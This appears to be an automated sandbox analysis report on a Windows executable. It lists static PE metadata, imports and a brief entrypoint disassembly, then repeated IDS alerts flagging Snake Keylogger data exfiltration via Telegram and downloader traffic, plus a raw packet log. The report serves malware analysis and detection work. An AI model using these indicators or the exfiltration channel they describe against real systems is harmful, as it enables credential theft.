                                                                                                        SSDEEP:12288:I5AeDyYI91QcLmn1XNu7Jj1JK8s5FEeKJ:ZebIEXNu7Jj1Jices
                                                                                                        TLSH:D79422116220D593E1FA4E364E70A3DF997ABB1695205F17C3C829963C376C3E81FA4E
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........
                                                                                                        Icon Hash:3d2e0f95332b3399
                                                                                                        Entrypoint:0x4032a0
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:4
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:4
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:4
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                                                                                        Instruction
                                                                                                        sub esp, 000002D4h
                                                                                                        push ebp
                                                                                                        push esi
                                                                                                        push 00000020h
                                                                                                        xor ebp, ebp
                                                                                                        pop esi
                                                                                                        mov dword ptr [esp+0Ch], ebp
                                                                                                        push 00008001h
                                                                                                        mov dword ptr [esp+0Ch], 0040A300h
                                                                                                        mov dword ptr [esp+18h], ebp
                                                                                                        call dword ptr [004080B0h]
                                                                                                        call dword ptr [004080ACh]
                                                                                                        cmp ax, 00000006h
                                                                                                        je 00007F0F091A14D3h
                                                                                                        push ebp
                                                                                                        call 00007F0F091A4616h
                                                                                                        cmp eax, ebp
                                                                                                        je 00007F0F091A14C9h
                                                                                                        push 00000C00h
                                                                                                        call eax
                                                                                                        push ebx
                                                                                                        push edi
                                                                                                        push 0040A2F4h
                                                                                                        call 00007F0F091A4593h
                                                                                                        push 0040A2ECh
                                                                                                        call 00007F0F091A4589h
                                                                                                        push 0040A2E0h
                                                                                                        call 00007F0F091A457Fh
                                                                                                        push 00000009h
                                                                                                        call 00007F0F091A45E4h
                                                                                                        push 00000007h
                                                                                                        call 00007F0F091A45DDh
                                                                                                        mov dword ptr [00434F04h], eax
                                                                                                        call dword ptr [00408044h]
                                                                                                        push ebp
                                                                                                        call dword ptr [004082A8h]
                                                                                                        mov dword ptr [00434FB8h], eax
                                                                                                        push ebp
                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                        push 000002B4h
                                                                                                        push eax
                                                                                                        push ebp
                                                                                                        push 0042B228h
                                                                                                        call dword ptr [0040818Ch]
                                                                                                        push 0040A2C8h
                                                                                                        push 00433F00h
                                                                                                        call 00007F0F091A41CAh
                                                                                                        call dword ptr [004080A8h]
                                                                                                        mov ebx, 0043F000h
                                                                                                        push eax
                                                                                                        push ebx
                                                                                                        call 00007F0F091A41B8h
                                                                                                        push ebp
                                                                                                        call dword ptr [00408178h]
                                                                                                        Programming Language:
                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85c80xa0.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x11e0.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x637c0x640083ff228d6dae8dd738eb2f78afbc793fFalse0.672421875data6.491609540807675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0x80000x147c0x1600d9f9b0b330e238260616b62a7a3cac09False0.42933238636363635data4.973928345594701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0xa0000x2aff80x6003f2b05c8fbb8b2e4c9c89e93d30e7252False0.53125data4.133631086111171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .ndata0x350000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .rsrc0x5d0000x11e00x120020639f4e7c421f5379e2fb9ea4a1530dFalse0.3684895833333333data4.485045860065118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_BITMAP0x5d2680x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                        RT_ICON0x5d5d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                                        RT_DIALOG0x5d8b80x144dataEnglishUnited States0.5216049382716049
                                                                                                        RT_DIALOG0x5da000x13cdataEnglishUnited States0.5506329113924051
                                                                                                        RT_DIALOG0x5db400x100dataEnglishUnited States0.5234375
                                                                                                        RT_DIALOG0x5dc400x11cdataEnglishUnited States0.6056338028169014
                                                                                                        RT_DIALOG0x5dd600xc4dataEnglishUnited States0.5918367346938775
                                                                                                        RT_DIALOG0x5de280x60dataEnglishUnited States0.7291666666666666
                                                                                                        RT_GROUP_ICON0x5de880x14dataEnglishUnited States1.2
                                                                                                        RT_MANIFEST0x5dea00x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                                        DLLImport
                                                                                                        KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                        USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                        ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                        EnglishUnited States
                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2025-01-10T19:56:18.646039+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949973142.250.185.110443TCP
                                                                                                        2025-01-10T19:56:23.891367+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949975193.122.6.16880TCP
                                                                                                        2025-01-10T19:56:30.891377+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949975193.122.6.16880TCP
                                                                                                        2025-01-10T19:56:31.807597+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949978149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:32.177767+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949978149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:33.032027+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949979193.122.6.16880TCP
                                                                                                        2025-01-10T19:56:33.618945+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949980149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:33.861648+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949980149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:35.330479+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949982149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:35.693207+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949982149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:36.964352+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949984149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:37.490510+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949984149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:39.028995+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949986149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:39.489661+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949986149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:40.972524+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949988149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:41.456118+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949988149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:42.787510+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949990149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:43.133611+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949990149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:44.379360+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949992149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:44.714361+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949992149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:46.219496+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949994149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:46.560662+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949994149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:47.844249+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949996149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:48.242610+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949996149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:49.523005+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949998149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:50.101630+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949998149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:51.474015+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950000149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:52.036258+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950000149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:53.341257+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950002149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:53.769670+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950002149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:55.067585+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950004149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:55.394028+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950004149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:56.718469+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950006149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:57.036409+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950006149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:58.352507+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950008149.154.167.220443TCP
                                                                                                        2025-01-10T19:56:58.782032+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950008149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:00.088414+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950010149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:00.408259+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950010149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:01.883437+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950012149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:02.211258+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950012149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:03.527252+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950014149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:03.848515+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950014149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:05.151965+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950016149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:05.506662+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950016149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:06.936842+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950018149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:07.300338+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950018149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:08.567100+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950020149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:09.117249+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950020149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:10.433174+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950022149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:10.850360+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950022149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:12.362356+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950024149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:12.700886+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950024149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:14.069016+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950026149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:14.362942+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950026149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:15.709271+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950028149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:16.226507+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950028149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:17.521702+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950030149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:17.839667+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950030149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:19.212304+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950032149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:19.456246+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950032149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:20.936355+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950034149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:21.448036+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950034149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:23.096862+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950036149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:23.378003+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950036149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:24.780435+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950038149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:25.113171+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950038149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:26.774780+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950040149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:26.997515+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950040149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:29.270759+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950042149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:29.619187+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950042149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:31.445917+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950044149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:31.750008+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950044149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:33.309516+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950046149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:33.598481+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950046149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:39.436070+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950048149.154.167.220443TCP
                                                                                                        2025-01-10T19:57:39.793053+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950048149.154.167.220443TCP
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 10, 2025 19:56:17.507174969 CET49973443192.168.2.9142.250.185.110
                                                                                                        Jan 10, 2025 19:56:17.507220984 CET44349973142.250.185.110192.168.2.9
                                                                                                        Jan 10, 2025 19:56:17.507333994 CET49973443192.168.2.9142.250.185.110
                                                                                                        Jan 10, 2025 19:56:17.521965027 CET49973443192.168.2.9142.250.185.110
                                                                                                        Jan 10, 2025 19:56:17.522003889 CET44349973142.250.185.110192.168.2.9
                                                                                                        Jan 10, 2025 19:56:18.177457094 CET44349973142.250.185.110192.168.2.9
                                                                                                        Jan 10, 2025 19:56:18.177598000 CET49973443192.168.2.9142.250.185.110
                                                                                                        Jan 10, 2025 19:56:18.178266048 CET44349973142.250.185.110192.168.2.9
                                                                                                        Jan 10, 2025 19:56:18.179097891 CET49973443192.168.2.9142.250.185.110
                                                                                                        Jan 10, 2025 19:56:18.236407042 CET49973443192.168.2.9142.250.185.110
                                                                                                        Jan 10, 2025 19:56:18.236443043 CET44349973142.250.185.110192.168.2.9
                                                                                                        Jan 10, 2025 19:56:18.236747980 CET44349973142.250.185.110192.168.2.9
                                                                                                        Jan 10, 2025 19:56:18.237602949 CET49973443192.168.2.9142.250.185.110
                                                                                                        Jan 10, 2025 19:56:18.240601063 CET49973443192.168.2.9142.250.185.110
                                                                                                        Jan 10, 2025 19:56:18.283329964 CET44349973142.250.185.110192.168.2.9
                                                                                                        Jan 10, 2025 19:56:18.646025896 CET44349973142.250.185.110192.168.2.9
                                                                                                        Jan 10, 2025 19:56:18.646204948 CET49973443192.168.2.9142.250.185.110
                                                                                                        Jan 10, 2025 19:56:18.646816969 CET49973443192.168.2.9142.250.185.110
                                                                                                        Jan 10, 2025 19:56:18.646867990 CET44349973142.250.185.110192.168.2.9
                                                                                                        Jan 10, 2025 19:56:18.646935940 CET49973443192.168.2.9142.250.185.110
                                                                                                        Jan 10, 2025 19:56:18.671574116 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:18.671607971 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:18.671680927 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:18.671931028 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:18.671945095 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:19.358052015 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:19.358170986 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:19.370199919 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:19.370228052 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:19.370480061 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:19.370534897 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:19.370876074 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:19.411330938 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.868748903 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.868899107 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.874660015 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.874743938 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.903917074 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.904000044 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.904032946 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.904052973 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.904068947 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.904102087 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.960949898 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.961016893 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.961044073 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.961070061 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.961103916 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.961122036 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.961158991 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.961287975 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.961338043 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.963531971 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.963588953 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.963644981 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.963691950 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.969764948 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.969824076 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.969835997 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.969894886 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.976129055 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.976198912 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.976218939 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.976275921 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.982417107 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.982475042 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.982486963 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.982538939 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.988585949 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.988640070 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.988648891 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.988701105 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.994716883 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.994777918 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:21.994862080 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:21.994909048 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.000639915 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.000709057 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.000716925 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.000756025 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.006330967 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.007136106 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.007143974 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.007188082 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.012083054 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.012137890 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.012145042 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.012190104 CET49974443192.168.2.9142.250.185.161
